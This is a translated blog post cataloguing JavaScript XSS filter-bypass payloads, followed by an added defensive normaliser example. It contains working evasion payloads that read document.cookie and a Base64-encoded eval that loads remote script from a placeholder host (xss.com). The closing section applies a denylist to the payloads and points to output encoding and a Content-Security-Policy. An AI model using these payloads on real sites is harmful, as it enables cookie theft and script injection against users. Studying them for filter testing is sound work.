XSS Filter Bypass Variants

Article from: https://www.cnblogs.com/iAmSoScArEd/p/11287928.html (iAmSoScArEd)

 

The techniques that go through window all work the same way: a global variable is reached as a property of the global object. window.self and self have the same effect.

1. window

window["document"]["cookie"] // replaces document.cookie

2. window

window['alert'](window["document"]["cookie"]); // replaces alert(document.cookie)

3. self

self["alert"]("123xss"); // replaces a conventional alert

4. Comments

(/*Hello*/self/*Safe*/)[/*NO*/"alert"/*Alarm*/]("123xss"); // replaces a conventional alert

5. String concatenation (replacing self with window has the same effect)

self["ale"+"rt"](self["doc"+"ument"]["coo"+"kie"]); // replaces a conventional alert

6. Hexadecimal escapes (replacing self with window has the same effect)

self["\x61\x6c\x65\x72\x74"](

   self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]

       ["\x63\x6f\x6f\x6b\x69\x65"]

)   //alert(document.cookie)
 

7. Base64 (replacing self with window has the same effect)

self["\x65\x76\x61\x6c"]( // eval

  self["\x61\x74\x6f\x62"]( // atob, the Base64 decoding method; the encoding method is btoa()
 
 "dmFyIGhlYWQgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCk7dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3NjcmlwdC5zZXRBdHRyaWJ1dGUoJ3R5cGUnLCAndGV4dC9qYXZhc2NyaXB0Jyk7c2NyaXB0LnNldEF0dHJpYnV0ZSgnc3JjJywgJ2h0dHA6Ly94c3MuY29tL3hzcy5qcycpO2hlYWQuYXBwZW5kQ2hpbGQoc2NyaXB0KTs =" ) 

) // var head = document.getElementsByTagName('head').item(0); var script = document.createElement('script'); script.setAttribute('type', 'text/javascript'); script.setAttribute('src', 'http://xss.com/xss.js'); head.appendChild(script);

8. jQuery

1) self["$"]["globalEval"]("alert(123)"); // alert(123)

2) self["\x24"] // $

  ["\x67\x6c\x6f\x62\x61\x6c\x45\x76\x61\x6c"] // globalEval

  ("\x61\x6c\x65\x72\x74\x28\x31\x32\x33\x29") // alert(123)

3) self["$"]["getScript"](url); // getScript fetches a JS script from url

9. Object.keys

a = 0; for (i in self) { if (i == "alert") { console.log(a); } a++; } // get the position of alert in the array
self[Object.keys(self)[7]]("123") // assuming the code above printed 7, this has the effect of alert("123")

 

// If we are not allowed to use the string "alert" and none of the methods above can be used,
// how do we find the index of "alert"? JavaScript can solve this problem.
// All we have to do is assign a function to a variable (a); the function iterates over self and finds the index of alert.
// We can then use test() with a regular expression to locate "alert", such as ^a[rel]+t$:
a = function () { c = 0; for (i in self) { if (/^a[rel]+t$/.test(i)) return c; c++; } }
a = () => { c = 0; for (i in self) { if (/^a[rel]+t$/.test(i)) { return c; } c++; } } // the same function in arrow form
self[Object.keys(self)[a()]]("123") // alert("123")

The ideas above come from screaming.
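Added example, not from the original article: a small normaliser a defender could run over submitted input. It shows that the comment, concatenation and hex-escape variants (4 to 6) collapse to the same property names once normalised, while the Object.keys index variant (9) carries no name to match. The denylist, function names and sample inputs are assumptions of this example.

```javascript
// Denylist is an assumption of this example, not taken from the article.
const SENSITIVE = new Set(["alert", "eval", "atob", "document", "cookie"]);

// Decode \xNN and \uNNNN; any other escape keeps the escaped character.
function decodeEscapes(body) {
  return body.replace(/\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([\s\S]))/g,
    (m, x, u, c) => (x || u ? String.fromCharCode(parseInt(x || u, 16)) : c));
}

// Split into string-literal values and other tokens. Block comments and
// whitespace are dropped; line comments and regex literals are not handled.
function tokenize(src) {
  const re = /(["'])((?:\\.|(?!\1)[^\\])*)\1|\/\*[\s\S]*?\*\/|\s+|([A-Za-z_$][\w$]*|[\s\S])/g;
  const tokens = [];
  for (const m of src.matchAll(re)) {
    if (m[1]) tokens.push({ str: decodeEscapes(m[2]) });
    else if (m[3]) tokens.push({ raw: m[3] });
  }
  return tokens;
}

// Fold "a" + "b" into one literal so split names are reassembled.
function foldConcat(tokens) {
  const out = [];
  for (const t of tokens) {
    const n = out.length;
    if ("str" in t && n >= 2 && out[n - 1].raw === "+" && "str" in out[n - 2]) {
      out.splice(n - 2, 2, { str: out[n - 2].str + t.str });
    } else out.push(t);
  }
  return out;
}

// Denylisted names reached as obj["name"] after normalisation.
function flaggedProperties(input) {
  const t = foldConcat(tokenize(input));
  const hits = [];
  for (let i = 1; i + 1 < t.length; i++) {
    if (t[i - 1].raw === "[" && t[i + 1].raw === "]" && SENSITIVE.has(t[i].str)) hits.push(t[i].str);
  }
  return hits;
}

// Constructed inputs modelled on variants 4, 5, 6 and 9 above.
const SAMPLES = {
  comments: String.raw`(/*Hello*/self/*Safe*/)[/*NO*/"alert"/*Alarm*/]("123xss")`,
  concat: String.raw`self["ale"+"rt"](self["doc"+"ument"]["coo"+"kie"])`,
  hex: String.raw`self["\x61\x6c\x65\x72\x74"](1)`,
  keysIndex: String.raw`self[Object.keys(self)[7]]("123")`,
};
for (const [k, v] of Object.entries(SAMPLES)) console.log(k, flaggedProperties(v));
```

Because the keysIndex sample returns no hits, name matching cannot be the primary control; contextual output encoding and a Content-Security-Policy address the injection itself.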
